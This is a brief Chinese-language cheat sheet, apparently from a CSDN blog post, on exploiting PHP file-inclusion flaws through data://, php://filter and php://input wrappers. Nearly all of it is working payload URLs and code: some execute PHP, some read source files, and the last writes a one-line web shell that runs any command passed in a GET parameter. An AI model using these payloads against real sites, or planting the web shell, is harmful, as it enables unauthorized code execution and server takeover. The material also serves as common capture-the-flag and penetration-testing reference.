https://blog.csdn.net/Jeff_12138/article/details/124815370





data://text/plain,
data://text/plain;base64,data://text/plain, 可以把后面的伪代码当作代码执行
http://xxx/include.php?file=data://text/plain,<?php phpinfo?>;data://text/plain;base64,
http://xxx/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b //后面这一串就是base64编码后的<?php phpinfo()?>php://filter/read=convert.base64-encode/resource=[文件名]//后面的可以省略读取文件源码
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.phpphp://input + [POST DATA]执行php代码
http://127.0.0.1/include.php?file=php://input[POST DATA部分]
[POST DATA]就是php代码,例如<?php phpinfo();?>如果有写入权限,则可以写入一句话木马
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>